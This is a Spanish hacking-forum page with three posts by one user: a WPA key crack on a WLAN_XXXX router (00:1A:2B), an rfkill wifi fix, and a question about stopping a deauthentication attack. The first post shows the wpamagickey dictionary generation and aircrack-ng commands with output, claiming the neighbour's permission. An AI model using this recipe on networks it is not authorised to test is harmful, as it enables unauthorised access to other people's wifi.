elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Wireless en Linux / WLAN_XXXX 00:1A:2B Juakeada con permiso,diccionario y handshake.. en: 9 Febrero 2013, 18:22 pm
Saludos a la comunidad.
Esta tarde me dió por probar unas cuantas cosillas...
la primera un capturador de handshake que viene en la distro WIFISLAX 4.3 Final(no recuerdo el nombre,pero sólo tiene uno)....una vez obtenido el paquete,reinicio y continúo con xubuntu...
la segunda...me descargo e instalo wpamagickey,una vez hecho,genero un diccionario para una WLAN_XYYX con mac 00:1A:2B...al cual le llamo dicc a secas.(X es Nº e Y LETRA)
Y ya por último,abro consola y le paso el diccionario al handshake con aircrack-ng  y BINGO...me da la wpa....y encima la CORRECTA...
Me explico...después de probar todos y cada uno de los programas que generaban una posible clave por defecto,NI UNO SOLO me dió la wpa correcta...y así durante meses...hasta hoy.
Reconozco que he tenido una suerte INCREÍBLE al estar la pass en el diccionario....no me ha dado tiempo ni a pestañear...apenas 1 sg XD :o

Os pongo un copy-paste del proceso por consola:

wpakill@MMXIII:~$ sudo wpamagickey  WLAN_XYYX 00:1A:2B:XX:XX:XX dicc



Essid: WLAN_XYYX - Bssid: 00:1A:2B:XX:XX:XX

  • Generando fichero de claves: dicc

 Calculadas 512 claves (10.8 kB)                                

  • Fichero guardado OK                        

wpakill@MMXIII:~$ sudo aircrack-ng -w /home/wpakill/Escritorio/dicc /home/wpakill/Escritorio/hs-00-1A-2B-XX-XX-XX.cap
[sudo] password for wpakill:
Opening /home/wpakill/Escritorio/hs-00-1A-2B-XX-XX-XX.cap
Read 13050 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1A:2B:XX:XX:XX  WLAN_XYYX                 WPA (1 handshake)

Choosing first network as target.

Opening /home/wpakill/Escritorio/hs-00-1A-2B-XX-XX-XX.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r2230


                   [00:00:01] 232 keys tested (149.21 k/s)


                     KEY FOUND! [ 20 letras y números ]


      Master Key     : 37 EB 8E 74 4F AB CD C0 E8 2D E9 DB 37 3D C3 80
                       edito toda la línea

      Transient Key  : 95 17 4A E6 F8 D4 F6 28 0E BB 2D 5A C3 8E 44 07
                       y 3 líneas mas

      EAPOL HMAC     : edito la línea
wpakill@MMXIII:~$


pd.NI QUÉ DECIR TIENE QUE ESTO PUEDO HACERLO CON EL PERMISO DE MI VECINO-COLEGA...obviamente la pass se la he cambiado yo mismo...una de las que pyrit tardaría 2 ó 3 años......luz :xD
2  Seguridad Informática / Wireless en Linux / RF-kill....SOLUCIONADO ipw2200 en: 14 Enero 2013, 15:58 pm
Saludos a la comunidad...trasteando con diferentes distros me "cargué" el wifi...mi tarjeta es una intel ipw2200...me pasaban cosas increíbles,como hacer un iwconfg,reconocer la interfaz pero no poder levantarla...o no poder conectarme a la red...y ya ni hablar de lanzar un airodump-ng...me lanzaba este mensaje:
ioctl (SIOCSIFFLAGS) failed:Operation not possible due to RF-kill

no obstante,como digo,mi sistema me la reconocía perfectamente.....incluso el led dejó de funcionar.Al principio pensé en algo físico...imposible pues no detectaría la interfaz...

ls -l /lib/firmware/ipw2200*
kaos@MMXIII~$ ls -l /lib/firmware/ipw2200*
-rw-r--r-- 1 root root 191154 2010-12-13 21:01 /lib/firmware/ipw2200-bss.fw
-rw-r--r-- 1 root root 185428 2010-12-13 21:01 /lib/firmware/ipw2200-ibss.fw
-rw-r--r-- 1 root root 187836 2010-12-13 21:01 /lib/firmware/ipw2200-sniffer.fw

o bien

kaos@MMXIII~$ lspci | grep Wireless
02:04.0 Network controller: Intel Corporation PRO/Wireless 2200BG [Calexico2] Network Connection (rev 05)

incluso probé con:
 $ sudo rm /dev/rfkill
pero nada....


Así que buscando por google dí con la solución,que no era otra que instalar de nuevo rfkill...
Una vez instalado

rfkill list wifi

apareía algo como esto:

ANTES

0: hp-wifi: Wireless LAN
Soft blocked: yes
Hard blocked: no
1: phy0: Wireless LAN
Soft blocked: no
Hard blocked: yes


Tenía bloqueado todo...para eso,usé el programa arriba mencionado y edité los bloqueos:

rfkill unblock 0
rfkill unblock 1

Después para asegurar que los cambios eran permanentes(sino,no estaría navegando xd ;)),ejecuto:

rfkill list wifi

DESPUÉS

kaos@MMXIII:~$ sudo rfkill list wifi
[sudo] password for kaos:
0: hp-wifi: Wireless LAN
   Soft blocked: no
   Hard blocked: no
1: phy0: Wireless LAN
   Soft blocked: no
   Hard blocked: no

Reiniciar
Y andando......

3  Seguridad Informática / Hacking Wireless / [MOD] ataque de deautenticación Wifi en: 5 Mayo 2012, 20:04 pm
Saludos a la comunidad.Tengo un problemilla(bueno,más bien mi madre) y es que hay alguien en el bloque lanzando un ataque de deautenticación permanentemente en la red wifi,lo cual hace que lógicamente no le vaya internet...y me tiene frito.Entiendo que lo hace o bien para obtener un handshake(con uno debería ser suficiente...tener un buen diccionario ya es otra historia) o para generar tráfico wep....un poco torpe, existiendo la inyección de paquetes,desde mi punto de vista.
Lo de tirar un cable de red y tal...complicado por el momento,ya que el router está en un lugar distinto y la mejor y casi única opción era la inhalámbrica....hasta que ha surgido el problema de turno.
Dado el conocimiento que poseemos en el tema inhalámbrico,hemos decidido abrir la red unos días y colocarle un sniffer...toda acción tiene una reacción... >:D
Pero independientemente,salvo tirar un cable de red(difícil al haber switch,firewall en máquinas diferentes y ubicación también)...¿existe alguna otra solución para detener este tipo de ataque?
Gracias de antemano y salud a todos  ;D
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines